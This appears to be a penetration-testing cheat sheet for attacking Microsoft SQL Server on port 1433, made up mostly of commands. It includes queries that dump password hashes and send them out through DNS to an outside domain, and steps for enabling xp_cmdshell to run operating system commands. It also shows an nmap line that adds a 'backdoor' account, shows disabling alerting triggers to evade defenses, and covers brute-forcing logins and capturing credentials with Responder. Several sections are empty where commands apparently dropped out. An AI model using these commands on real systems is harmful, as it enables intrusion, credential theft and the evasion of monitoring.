1433 - Microsoft SQL
Microsoft SQL Server is a relational database management system developed by Microsoft.
Normal Port - 1433
Hidden mode port - 2433
Connect
Connect using one of the following options:
sqsh
sqsh -S someserver -U sa -P password
metasploit
metasploit (mssql_login)
msf auxiliary(mssql_login) > use auxiliary/scanner/mssql/mssql_login
mssqclient
Impacket script mssqclient
mssqlclient.py reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth
sqlcmd
sqlcmd. To use SQL Server Authentication, you must specify a user name and password by using the -U and -P options.
sqlcmd -y0 -d ADSync -Q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
crackmapexec
cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
MSSQL 2003 commands
taken from: http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
Task | Command |
Version | SELECT @@version |
Comments | SELECT 1 -- comment SELECT /*comment*/1 |
Current User | SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID |
List Users | SELECT name FROM master..syslogins |
List Password Hashes | SELECT name, password FROM master..sysxlogins -- priv, mssql 2000; SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer. SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005; SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005 |
Password Cracker | MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these. |
List Privileges | Impossible? |
List DBA Accounts | TODO SELECT is_srvrolemember('sysadmin'); --priv -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentationSELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? return 1 for true, 0 for false, NULL for invalid role/username. |
Current Database | SELECT DB_NAME() |
List Databases | SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); -- for N = 0, 1, 2, ... |
List Columns | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable |
List Tables | SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list colum names and types for master..sometable |
Find Tables From Column Name | -- NB: This example works only for the current database. If you wan't to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects). SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password' |
Select Nth Row | SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row |
Select Nth Char | SELECT substring('abcd', 3, 1) -- returns c |
Bitwise AND | SELECT 6 & 2 -- returns 2 SELECT 6 & 1 -- returns 0 |
ASCII Value -> Char | SELECT char(0x41) -- returns A |
Char -> ASCII Value | SELECT ascii('A') - returns 65 |
Casting | SELECT CAST('1' as int); SELECT CAST(1 as char) |
String Concatenation | SELECT 'A' + 'B' - returns AB |
If Statement | IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1 |
Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1 |
Avoiding Quotes | SELECT char(65)+char(66) -- returns AB |
Time Delay | WAITFOR DELAY '0:0:5' -- pause for 5 seconds |
Make DNS Requests | declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000 declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005 -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. -- Also check out theDNS tunnel feature of sqlninja |
Command Execution | EXEC xp_cmdshell 'net user'; -- priv On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default: EXEC sp_configure 'show advanced options', 1; -- priv RECONFIGURE; -- priv EXEC sp_configure 'xp_cmdshell', 1; -- priv RECONFIGURE; -- priv |
Local File Access | CREATE TABLE mydata (line varchar(8000)); BULK INSERT mydata FROM 'c:\boot.ini'; DROP TABLE mydata; |
Hostname, IP Address | SELECT HOST_NAME() |
Create Users | EXEC sp_addlogin 'user', 'pass'; -- priv |
Drop Users | EXEC sp_droplogin 'user'; -- priv |
Make User DBA | EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin; -- priv |
Location of DB files | TODO |
Default/System Databases | northwind model msdb pubs tempdb |
MSSQL 2017 Commands
Current user’s permissions:
Check out the databases available:
I can look for user generated tables on those databases:
Enumeration
Nmap
Scan:
nmap -sU --script=ms-sql-info 192.168.1.108
Dump hashes:
nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
Execute command:
nmap -Pn -n -sS –script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 –script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd=”net user backdoor backdoor123 /add”
Metasploit
Find MSSQL servers:
msf > use auxiliary/scanner/mssql/mssql_ping
mssql_enum
The mssql_enum is an admin module that will accept a set of credentials and query a MSSQL for various configuration settings.
mssql_exec
The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.
PowerUpSQL
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
Link: https://github.com/NetSPI/PowerUpSQL
Example:
Or load into memory
SQL Server Discovery Cheats
Description | Command |
Discover Local SQL Server Instances | Get-SQLInstanceLocal -Verbose |
Discover Remote SQL Server Instances | UDP Broadcast Ping Get-SQLInstanceBroadcast -Verbose UDP Port Scan Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1 Get the instance list from a file Get-SQLInstanceFile -FilePath c:\temp\computers.txt | Get-SQLInstanceScanUDPThreaded -Verbose |
Discover Active Directory Domain SQL Server Instances | Get-SQLInstanceDomain -Verbose |
Discover Active Directory Domain SQL Server Instances using alternative domain credentials | runas /noprofile /netonly /user:domain\user PowerShell.exe import-module PowerUpSQL.psd1 Get-SQLInstanceDomain -Verbose -DomainController 192.168.1.1 -Username domain\user -password P@ssword123 |
List SQL Servers using a specific domain account | Get-SQLInstanceDomain -Verbose -DomainAccount SQLSvc |
List shared domain user SQL Server service accounts | Get-SQLInstanceDomain -Verbose | Group-Object DomainAccount | Sort-Object count -Descending | select Count,Name | Where-Object {($_.name -notlike "*$") -and ($_.count -gt 1) } |
More commands can be found in the github repo or in the tool section.
Linked Servers
Microsoft SQL Server allows links to be created to external data sources such as other SQL servers, Oracle databases, excel spreadsheets, and so on. Due to common misconfigurations the links, or “Linked Servers”, can often be exploited to traverse database link networks, gain unauthorized access to data, and deploy shells.
Source: https://blog.netspi.com/how-to-hack-database-links-in-sql-server/
Find linked servers:
Execute commands on the other server:
Bruteforce login
Metasploit
Bruteforce MSSQL Login
msf > use auxiliary/admin/mssql/mssql_login
Metasploit MSSQL Shell
Nmap
Enable xp_cmdshell
Check if enabled
xp_cmdshell whoami
Or
EXEC xp_cmdshell 'net user'; -- priv
Or
EXEC master.dbo.xp_cmdshell 'cmd';
Enable xp_cmdshell
Short way:
Long way:
Check if it works
xp_cmdshell 'dir C:\'
Disable Trigger
If you get a error when we try to enable xp_cmdshell on trigger, such as:
These triggers are a policy put in place to alert and block attempts to enable and use xp_cmdshell. The problem is, as sa, we can disable these triggers.
SQL> disable trigger ALERT_xp_cmdshell on all server
And then enable xp_cmdshell
Capture credentials using xp_dirtree
Capture credentials using responder and xp_dirtree:
Start Responder:
root@kali# responder -I eth0
Issue the connect to load a file using xp_dirtree from an SMB share (that doesn’t exist) on our host:
It doesn’t return anything, but in the responder window, I’ve captured the necessary information:
Execue_external_script
We can use sp_execute_external_scrip to execute external command,
SQL Server 2017 now supports Python as an extensible script engine and we can use it to execute commands:
Last updated